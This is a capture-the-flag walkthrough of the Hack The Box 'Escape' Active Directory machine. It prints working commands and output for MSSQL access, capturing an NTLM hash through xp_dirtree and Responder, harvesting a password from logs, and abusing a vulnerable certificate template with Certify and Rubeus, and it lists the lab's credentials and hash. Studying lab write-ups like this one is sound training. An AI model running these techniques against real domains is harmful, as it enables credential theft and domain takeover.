Medium windows box that includes stealing NTLM hash through mssql, passwords in logs files and privilege escalation via certificate template!
Credentials
Username
Password
Description
PublicUser
GuestUserCantWrite1
MS SQL password
sql_svc
REGGIE1234ronnie
AD Account responsible for running database server
ryan.cooper
NuclearMosquito3
Active directory user found in SQLServer logs
Administartor
A52F78E4C751E5F5E17E1E9F3E58F4EE
NTLM hash
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/Documents/CTFs/HTB_Escape]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49710,49714,59666 -A -T4 10.10.11.202 -oA nmap_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-04 13:23 EDT
Nmap scan report for 10.10.11.202
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-05 01:23:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-06-02T13:28:16
|_Not valid after: 2053-06-02T13:28:16
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
59666/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-05T01:23:57
|_ start_date: N/A
|_clock-skew: mean: 7h59m23s, deviation: 0s, median: 7h59m22s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 39.26 ms 10.10.14.1
2 39.43 ms 10.10.11.202
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.96 seconds
SMB Shares
└─$ smbclient -L //10.10.11.202
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
There is one non-default share Public after trying to connect to it there is PDF file.
└─$ smbclient \\\\10.10.11.202\\Public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1394427 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (211.3 KiloBytes/sec) (average 211.3 KiloBytes/sec)
SQL Server Procedures.pdf
This pdf contain some information about connecting to SQL database without Active Directory account.
MS SQL
For connection to database I used impacket-mssql script
└─$ impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
Databases
SQL> SELECT name FROM master.dbo.sysdatabases;
name
--------
master
tempdb
model
msdb
master, tempdb, msdb are default databases used by mssql and to model table there is no permission for current user.
SQL> use model;
[-] ERROR(DC\SQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL>
Permissions
SQL> use master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
SQL> EXEC sp_helprotect 'xp_cmdshell';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_dirtree';
Owner Object Grantee Grantor ProtectType Action Column
------ -------------------- ------------ ------- ----------- -------------- ------
sys xp_dirtree public dbo b'Grant ' Execute .
SQL> EXEC sp_helprotect 'xp_subdirs';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_fileexist';
Owner Object Grantee Grantor ProtectType Action Column
------ ------------------------ ------------ ------- ----------- -------------- ------
sys xp_fileexist public dbo b'Grant ' Execute .
Current user can't execute xp_cmdshell - this allows running shell commands on database server directly through database.
But there is permission for xp_dirtree command and this can be used to steal NTLM hash of user that is running database server.
This should be also possible with xp_fileexist but I had no luck with that function.
Stealing NTLM hash
Setting up Responder
Responder is software that talk with most of the protocols it is focused on stealing hashes and credentials.
┌──(kali㉿kali)-[~/Documents/CTFs/HTB_Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.109]
Responder IPv6 [dead:beef:2::106b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-NCM14VQ3QD4]
Responder Domain Name [KHXV.LOCAL]
Responder DCE-RPC Port [47910]
[+] Listening for events...
So password for sql_svc account is REGGIE1234ronnie
Foothold
Acquired credentials have permissions to conect via remote access.
Enumeration
I have run winpeas but there is nothing special in there. So next step was manual enumeration.
As there was nothing in home direcotry of sql_svc user and SQLServer is only one non-default directory (because of running MS SQL server) I started looking around. Only semi-interesting file is ERRORLOG.BAK Located at C:\SQLServer\Logs
In there is password for user ryan.cooper
Log states Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Next entry is Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
NuclearMosquito3 looks like a password so this is propably a typo from user side and he type password in username field.
This was indeed password for ryan.cooper user and this allowed for login in his account
Privilege Escalation
I have ran winpeas again but no luck there. Additionaly I gathered information about domain with Sharphound to analyze permissions and connections in Bloodhound but again no luck.
But there is this trend in windows enviroment that switch for certificate authorization. There are many things that can go wrong e.g. certificate template with too wide permissions.
To certificate be vulnerable some specyfic flags need to be set:
msPKI-Certificate-Name-Flag set to ENROLLEE_SUPPLIES_SUBJECT this means that user requesting certificate can specify subject - effectively a user that will be authenticated
Access Rights needs to Allows Enroll to NT AUTHORITY\Authenticated Users this means any logged in user can request certificate
pkiextendedkeyusage needs to have set Client Authentication to allows impersonating another user
Vulnerable Certificate Template
For detecting any vulnerable certificate template there is handy tool Certify
Certify completed in 00:00:00.0041996
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2010590
Generating new certificate for Administrator account
Certify can be used to requesting new certificate for this this flags need to be supplied:
/ca CA Name from previous Ceritfy output
/template template name to use here UserAuthentication
After converting certificate in PEM to right format with openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx as suggested in Certify output it need to be transfered back to windows box.
I did it by setting up python web server python -m http.server and downloading it on windows box IWR http://10.10.14.109:8000/cert.pfx -Outfile cert.pfx
With certificate on the disk next we need Rubeus to interact with Kerberos and request ticket for Administrator account using generated certificate.
asktgt mode responsible for requesting TGT tickests
